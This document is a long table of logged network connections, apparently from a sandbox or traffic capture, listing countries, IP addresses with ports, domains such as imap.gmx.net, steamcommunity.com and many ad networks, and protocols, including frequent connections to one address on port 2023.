| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 74.125.206.113:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 74.125.206.113:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BG | 79.110.49.184:80 | bflzpny.com | tcp |
| US | 8.8.8.8:53 | x.clarity.ms | udp |
| US | 20.114.190.119:443 | x.clarity.ms | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| GB | 142.250.178.14:443 | google.com | udp |
| NL | 185.89.210.212:443 | ams3-ib.adnxs.com | tcp |
| US | 8.8.8.8:53 | easyquickmanuals.com | udp |
| FR | 54.230.112.27:443 | easyquickmanuals.com | tcp |
| US | 151.101.66.137:443 | code.jquery.com | tcp |
| US | 8.8.8.8:53 | easy-quick-manuals.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | csm.nl3.eu.criteo.net | udp |
| NL | 178.250.1.25:443 | csm.nl3.eu.criteo.net | tcp |
| US | 3.5.9.161:443 | easy-quick-manuals.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | d2zntbsofnjy3f.cloudfront.net | udp |
| FR | 54.240.170.163:443 | d2zntbsofnjy3f.cloudfront.net | tcp |
| US | 8.8.8.8:53 | 27.112.230.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.9.5.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.170.240.54.in-addr.arpa | udp |
| US | 3.5.9.161:443 | easy-quick-manuals.s3.amazonaws.com | tcp |
| US | 3.5.9.161:443 | easy-quick-manuals.s3.amazonaws.com | tcp |
| US | 3.5.9.161:443 | easy-quick-manuals.s3.amazonaws.com | tcp |
| US | 3.5.9.161:443 | easy-quick-manuals.s3.amazonaws.com | tcp |
| US | 3.5.9.161:443 | easy-quick-manuals.s3.amazonaws.com | tcp |
| BE | 64.233.166.155:443 | stats.g.doubleclick.net | udp |
| GB | 142.250.187.206:443 | analytics.google.com | udp |
| FR | 3.160.203.181:443 | d3hie7oi3rbo2u.cloudfront.net | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.21.28.75:443 | go.enderman.ch | udp |
| US | 172.67.21.227:443 | s3.vlitag.com | udp |
| FR | 52.85.3.232:443 | aax.amazon-adsystem.com | tcp |
| NL | 185.184.8.90:443 | creativecdn.com | tcp |
| DE | 178.63.241.79:443 | shb.richaudience.com | tcp |
| IE | 34.251.66.169:443 | ap.lijit.com | tcp |
| IE | 54.239.33.158:443 | aax-eu.amazon-adsystem.com | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | udp |
| GB | 172.217.169.65:443 | 71262f27d3448e73366520c0116f6513.safeframe.googlesyndication.com | tcp |
| FR | 216.137.52.34:443 | s.ad.smaato.net | tcp |
| NL | 35.214.244.87:443 | csync.loopme.me | tcp |
| DE | 51.89.9.252:443 | onetag-sys.com | tcp |
| NL | 35.214.168.80:443 | trace-eu.mediago.io | tcp |
| IE | 52.210.242.228:443 | match.prod.bidr.io | tcp |
| US | 8.8.8.8:53 | b1sync.zemanta.com | udp |
| US | 70.42.32.159:443 | b1sync.zemanta.com | tcp |
| DE | 18.197.199.178:443 | match.sharethrough.com | tcp |
| US | 8.8.8.8:53 | sync-amz.ads.yieldmo.com | udp |
| IE | 54.217.169.137:443 | sync-amz.ads.yieldmo.com | tcp |
| NL | 208.93.169.131:443 | bh.contextweb.com | tcp |
| US | 209.54.182.161:443 | s.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | pulsepoint-match.dotomi.com | udp |
| NL | 89.207.16.137:443 | pulsepoint-match.dotomi.com | tcp |
| GB | 172.217.16.225:443 | images1-focus-opensocial.googleusercontent.com | udp |
| GB | 172.217.16.225:443 | images1-focus-opensocial.googleusercontent.com | tcp |
| NL | 81.17.55.170:443 | ssbsync.smartadserver.com | tcp |
| US | 8.8.8.8:53 | 159.32.42.70.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.169.217.54.in-addr.arpa | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 13.248.245.213:443 | eb2.3lift.com | tcp |
| IE | 54.239.33.158:443 | aax-eu.amazon-adsystem.com | tcp |
| IE | 54.239.33.158:443 | aax-eu.amazon-adsystem.com | tcp |
| IE | 54.171.72.23:443 | ce.lijit.com | tcp |
| DE | 91.228.74.159:443 | cms.quantserve.com | tcp |
| NL | 69.173.156.148:443 | pixel.rubiconproject.com | tcp |
| US | 52.223.40.198:443 | data.adsrvr.org | tcp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| US | 8.8.8.8:53 | sid.storygize.net | udp |
| US | 143.244.208.184:443 | sid.storygize.net | tcp |
| US | 8.8.8.8:53 | ads.yieldmo.com | udp |
| IE | 99.81.151.194:443 | ads.yieldmo.com | tcp |
| IE | 99.81.151.194:443 | ads.yieldmo.com | tcp |
| IE | 99.81.151.194:443 | ads.yieldmo.com | tcp |
| IE | 99.81.151.194:443 | ads.yieldmo.com | tcp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 8.8.8.8:53 | beacons2.gvt2.com | udp |
| GB | 216.58.213.3:443 | beacons2.gvt2.com | tcp |
| GB | 216.58.213.3:443 | beacons2.gvt2.com | udp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| DE | 141.95.33.120:443 | lb.eu-1-id5-sync.com | tcp |
| US | 8.8.8.8:53 | id.a-mx.com | udp |
| DE | 167.235.114.248:443 | sync.richaudience.com | tcp |
| NL | 79.127.227.46:443 | id.a-mx.com | tcp |
| US | 8.8.8.8:53 | 194.151.81.99.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.208.244.143.in-addr.arpa | udp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| DE | 162.19.138.83:443 | lb.eu-1-id5-sync.com | tcp |
| US | 8.8.8.8:53 | c3.a-mo.net | udp |
| DE | 79.127.216.47:443 | c3.a-mo.net | tcp |
| US | 69.173.151.100:443 | pixel-us-east.rubiconproject.com | tcp |
| FR | 3.160.196.25:443 | sync.serverbid.com | tcp |
| US | 8.8.8.8:53 | ums.acuityplatform.com | udp |
| US | 8.2.110.134:443 | cs.krushmedia.com | tcp |
| US | 18.211.202.82:443 | aorta.clickagy.com | tcp |
| NL | 46.228.174.117:443 | sync.targeting.unrulymedia.com | tcp |
| NL | 82.145.213.8:443 | t.adx.opera.com | tcp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | udp |
| NL | 35.204.74.118:443 | um.simpli.fi | tcp |
| NL | 154.59.122.79:443 | ums.acuityplatform.com | tcp |
| US | 35.244.159.8:443 | us-u.openx.net | udp |
| GB | 2.21.188.239:443 | ads.pubmatic.com | tcp |
| US | 8.8.8.8:53 | dsp.nrich.ai | udp |
| FR | 51.68.39.188:443 | dsp.nrich.ai | tcp |
| US | 35.171.81.170:443 | ssp.disqus.com | tcp |
| GB | 216.58.204.70:443 | s0.2mdn.net | udp |
| US | 172.64.151.101:443 | dsum-sec.casalemedia.com | udp |
| NL | 69.173.156.148:443 | pixel.rubiconproject.com | tcp |
| DK | 37.157.2.228:443 | c1.adform.net | tcp |
| US | 52.72.91.47:443 | cs-server-s2s.yellowblue.io | tcp |
| NL | 77.245.57.72:443 | sync.adkernel.com | tcp |
| NL | 77.245.57.72:443 | sync.adkernel.com | tcp |
| NL | 77.245.57.72:443 | sync.adkernel.com | tcp |
| NL | 188.42.191.196:443 | ads.betweendigital.com | tcp |
| US | 8.8.8.8:53 | 46.227.127.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.216.127.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.122.59.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.39.68.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cache.betweendigital.com | udp |
| NL | 77.245.57.72:443 | sync.adkernel.com | tcp |
| US | 8.8.8.8:53 | ads.stickyadstv.com | udp |
| NL | 77.245.57.72:443 | sync.adkernel.com | tcp |
| US | 8.8.8.8:53 | image8.pubmatic.com | udp |
| US | 8.8.8.8:53 | triplelift-match.dotomi.com | udp |
| FR | 154.54.250.80:443 | ads.stickyadstv.com | tcp |
| GB | 185.64.190.79:443 | image8.pubmatic.com | tcp |
| NL | 89.207.16.201:443 | triplelift-match.dotomi.com | tcp |
| NL | 151.236.127.145:443 | cache.betweendigital.com | tcp |
| US | 8.8.8.8:53 | eu-u.openx.net | udp |
| US | 8.8.8.8:53 | secure.adnxs.com | udp |
| US | 34.98.64.218:443 | eu-u.openx.net | tcp |
| US | 8.8.8.8:53 | rtb.mfadsrvr.com | udp |
| US | 8.8.8.8:53 | sync.mathtag.com | udp |
| US | 8.8.8.8:53 | cs.admanmedia.com | udp |
| US | 216.200.232.253:443 | sync.mathtag.com | tcp |
| US | 8.8.8.8:53 | spl.zeotap.com | udp |
| US | 80.77.87.162:443 | cs.admanmedia.com | tcp |
| DE | 52.29.4.131:443 | rtb.mfadsrvr.com | tcp |
| FR | 91.134.110.132:443 | ssbsync-global.smartadserver.com | tcp |
| US | 104.22.51.98:443 | spl.zeotap.com | tcp |
| US | 209.54.182.161:443 | s.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | cs.yellowblue.io | udp |
| IE | 34.250.199.34:443 | pr-bh.ybp.yahoo.com | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| IE | 54.170.105.17:443 | cs.yellowblue.io | tcp |
| DE | 3.75.62.37:443 | ups.analytics.yahoo.com | tcp |
| US | 8.8.8.8:53 | casale-match.dotomi.com | udp |
| US | 8.8.8.8:53 | dsum.casalemedia.com | udp |
| US | 104.18.36.155:443 | dsum.casalemedia.com | tcp |
| US | 8.8.8.8:53 | sync.adotmob.com | udp |
| FR | 45.137.176.88:443 | sync.adotmob.com | tcp |
| US | 8.8.8.8:53 | sync.bumlam.com | udp |
| US | 8.8.8.8:53 | 79.190.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.16.207.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.250.54.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.127.236.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.64.98.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.110.134.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.4.29.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.51.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.87.77.80.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.232.200.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.105.170.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.36.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.176.137.45.in-addr.arpa | udp |
| DE | 31.172.81.158:443 | sync.bumlam.com | tcp |
| DE | 31.172.81.158:443 | sync.bumlam.com | tcp |
| US | 8.8.8.8:53 | x01.aidata.io | udp |
| RU | 89.108.120.68:443 | x01.aidata.io | tcp |
| DE | 31.172.81.158:443 | sync.bumlam.com | tcp |
| US | 8.8.8.8:53 | an.yandex.ru | udp |
| RU | 77.88.21.90:443 | an.yandex.ru | tcp |
| US | 8.8.8.8:53 | 158.81.172.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.120.108.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | yandex.ru | udp |
| RU | 5.255.255.77:443 | yandex.ru | tcp |
| US | 8.8.8.8:53 | secure-assets.rubiconproject.com | udp |
| BE | 104.68.78.171:443 | secure-assets.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | eus.rubiconproject.com | udp |
| BE | 23.55.98.169:443 | eus.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | www.tns-counter.ru | udp |
| US | 8.8.8.8:53 | token.rubiconproject.com | udp |
| RU | 194.226.130.226:443 | www.tns-counter.ru | tcp |
| NL | 69.173.156.148:443 | token.rubiconproject.com | tcp |
| NL | 69.173.156.148:443 | token.rubiconproject.com | tcp |
| NL | 188.42.191.196:443 | ads.betweendigital.com | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| US | 8.8.8.8:53 | 90.21.88.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.255.255.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.78.68.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.98.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.130.226.194.in-addr.arpa | udp |
| DE | 51.89.9.252:443 | onetag-sys.com | tcp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 13.107.42.14:443 | px.ads.linkedin.com | tcp |
| US | 52.223.40.198:443 | data.adsrvr.org | tcp |
| NL | 69.173.156.148:443 | token.rubiconproject.com | tcp |
| IE | 34.250.199.34:443 | pr-bh.ybp.yahoo.com | tcp |
| US | 8.8.8.8:53 | s.amazon-adsystem.com | udp |
| US | 52.46.128.147:443 | s.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | aax-eu.amazon-adsystem.com | udp |
| IE | 52.95.122.74:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | 147.128.46.52.in-addr.arpa | udp |
| NL | 69.173.156.148:443 | token.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | match.prod.bidr.io | udp |
| IE | 34.255.48.153:443 | match.prod.bidr.io | tcp |
| US | 8.8.8.8:53 | live.primis.tech | udp |
| FR | 18.161.97.101:443 | live.primis.tech | tcp |
| US | 8.8.8.8:53 | prebid.a-mo.net | udp |
| NL | 145.40.97.66:443 | prebid.a-mo.net | tcp |
| US | 8.8.8.8:53 | ce.lijit.com | udp |
| IE | 54.75.221.163:443 | ce.lijit.com | tcp |
| US | 8.8.8.8:53 | capi.connatix.com | udp |
| US | 104.18.41.104:443 | capi.connatix.com | tcp |
| US | 8.8.8.8:53 | sync.ipredictive.com | udp |
| US | 54.144.2.150:443 | sync.ipredictive.com | tcp |
| NL | 185.89.210.20:443 | secure.adnxs.com | tcp |
| US | 8.8.8.8:53 | 74.122.95.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.48.255.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.97.161.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.97.40.145.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.221.75.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.41.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.2.144.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 74.125.206.113:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 74.125.206.113:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 172.67.202.35:443 | monitor.repocket.com | tcp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 142.250.187.238:443 | clients1.google.com | udp |
| GB | 172.217.169.46:443 | cse.google.com | udp |
| GB | 142.250.178.14:443 | google.com | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| DE | 212.227.17.170:993 | imap.gmx.net | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | imap.web.de | udp |
| DE | 212.227.17.178:993 | imap.web.de | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 178.17.227.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | i.instagram.com | udp |
| GB | 157.240.221.63:443 | i.instagram.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| DE | 212.227.17.170:993 | imap.gmx.net | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| DE | 212.227.17.170:993 | imap.gmx.net | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BG | 79.110.49.184:80 | bflzpny.com | tcp |
| US | 20.114.190.119:443 | x.clarity.ms | tcp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| GB | 216.58.213.3:443 | beacons2.gvt2.com | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 8.8.8.8:53 | s.youtube.com | udp |
| BE | 74.125.206.139:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 139.206.125.74.in-addr.arpa | udp |
| DE | 212.227.17.178:993 | imap.web.de | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| NL | 23.62.61.97:443 | www.bing.com | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | google.com | udp |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | www.marktplaats.nl | udp |
| FR | 54.230.112.36:443 | www.marktplaats.nl | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 36.112.230.54.in-addr.arpa | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| FR | 18.161.97.5:443 | 1816e4d6cd83.ba5a2ce6.us-east-2.token.awswaf.com | udp |
| US | 8.8.8.8:53 | 5.97.161.18.in-addr.arpa | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| GB | 95.168.184.125:443 | fp-4.check.ipcheckhost.com | tcp |
| GB | 54.38.210.150:443 | tcp | |
| US | 104.244.42.65:443 | twitter.com | tcp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| NL | 185.15.59.224:443 | www.wikipedia.org | tcp |
| GB | 54.38.210.150:443 | tcp | |
| GB | 54.38.210.150:443 | tcp | |
| GB | 54.38.210.150:443 | tcp | |
| GB | 54.38.210.150:443 | tcp | |
| GB | 54.38.210.150:443 | tcp | |
| US | 8.8.8.8:53 | en.wikipedia.org | udp |
| NL | 185.15.59.224:443 | en.wikipedia.org | tcp |
| GB | 54.38.210.150:443 | tcp | |
| US | 15.204.58.197:443 | fp-0.check.ipcheckhost.com | tcp |
| GB | 54.38.210.150:443 | tcp | |
| US | 8.8.8.8:53 | 224.59.15.185.in-addr.arpa | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 197.58.204.15.in-addr.arpa | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 74.125.206.139:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | api.steampowered.com | udp |
| BE | 104.68.92.92:80 | api.steampowered.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| DE | 212.227.17.170:993 | imap.gmx.net | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 74.125.206.139:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BG | 79.110.49.184:80 | bflzpny.com | tcp |
| US | 8.8.8.8:53 | i.instagram.com | udp |
| GB | 163.70.151.63:443 | i.instagram.com | tcp |
| DE | 212.227.17.178:993 | imap.web.de | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 63.151.70.163.in-addr.arpa | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | x.clarity.ms | udp |
| US | 20.114.190.119:443 | x.clarity.ms | tcp |
| DE | 212.227.17.170:993 | imap.gmx.net | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| FR | 195.154.173.35:2023 | tcp | |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 104.21.58.202:443 | api.peer2profit.global | tcp |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | monitor.repocket.com | udp |
| US | 104.21.69.4:443 | monitor.repocket.com | tcp |
| US | 8.8.8.8:53 | m-api.nexon.com | udp |
| JP | 52.68.135.224:443 | m-api.nexon.com | tcp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 104.21.58.202:443 | api.peer2profit.global | tcp |
| US | 8.8.8.8:53 | 224.135.68.52.in-addr.arpa | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | www.marktplaats.nl | udp |
| FR | 54.230.112.4:443 | www.marktplaats.nl | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 4.112.230.54.in-addr.arpa | udp |
| JP | 52.68.135.224:443 | m-api.nexon.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 74.125.206.139:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | api.steampowered.com | udp |
| BE | 104.68.92.92:80 | api.steampowered.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 165.232.155.117:443 | login.edge.app | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | maxask.com | udp |
| US | 8.8.8.8:53 | platform-api.sharethis.com | udp |
| US | 8.8.8.8:53 | cse.google.com | udp |
| FR | 216.137.52.32:443 | platform-api.sharethis.com | tcp |
| GB | 142.250.179.238:443 | cse.google.com | udp |
| US | 8.8.8.8:53 | www.adsensecustomsearchads.com | udp |
| US | 8.8.8.8:53 | clients1.google.com | udp |
| GB | 142.250.187.238:443 | clients1.google.com | udp |
| GB | 142.250.187.238:443 | clients1.google.com | udp |
| FR | 216.137.52.32:443 | platform-api.sharethis.com | tcp |
| US | 8.8.8.8:53 | 32.52.137.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | buttons-config.sharethis.com | udp |
| US | 8.8.8.8:53 | l.sharethis.com | udp |
| IE | 52.16.107.53:443 | l.sharethis.com | tcp |
| FR | 18.161.97.61:443 | buttons-config.sharethis.com | tcp |
| FR | 18.161.97.61:443 | buttons-config.sharethis.com | tcp |
| IE | 52.16.107.53:443 | l.sharethis.com | tcp |
| US | 8.8.8.8:53 | 53.107.16.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | datasphere-sbsvc.sharethis.com | udp |
| US | 104.16.79.73:443 | cloudflareinsights.com | tcp |
| FR | 3.160.188.13:443 | datasphere-sbsvc.sharethis.com | tcp |
| US | 8.8.8.8:53 | 61.97.161.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | count-server.sharethis.com | udp |
| US | 8.8.8.8:53 | platform-cdn.sharethis.com | udp |
| FR | 52.84.45.68:443 | count-server.sharethis.com | tcp |
| FR | 216.137.52.19:443 | platform-cdn.sharethis.com | tcp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| DE | 212.227.17.178:993 | imap.web.de | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | clients88.google.com | udp |
| BE | 74.125.206.139:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| RU | 151.248.116.172:80 | search-cdn.net | tcp |
| RU | 151.248.116.172:80 | search-cdn.net | tcp |
| US | 104.16.79.73:443 | cloudflareinsights.com | tcp |
| US | 104.21.35.42:443 | maxask.com | udp |
| US | 8.8.8.8:53 | 42.35.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | udp |
| BG | 79.110.49.184:80 | bflzpny.com | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| RU | 87.240.190.75:443 | tcp | |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | 75.190.240.87.in-addr.arpa | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 74.125.206.139:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| US | 8.8.8.8:53 | i.instagram.com | udp |
| GB | 157.240.221.63:443 | i.instagram.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| BE | 74.125.206.139:443 | s.youtube.com | tcp |
| FR | 195.154.173.35:2023 | tcp | |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | malwarewatch.org | udp |
| US | 104.21.46.176:443 | malwarewatch.org | tcp |
| US | 104.21.46.176:443 | malwarewatch.org | udp |
| US | 8.8.8.8:53 | unpkg.com | udp |
| US | 104.17.246.203:443 | unpkg.com | tcp |
| US | 8.8.8.8:53 | use.fontawesome.com | udp |
| US | 172.67.142.245:443 | use.fontawesome.com | tcp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 216.58.212.206:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 142.250.187.214:443 | i.ytimg.com | tcp |
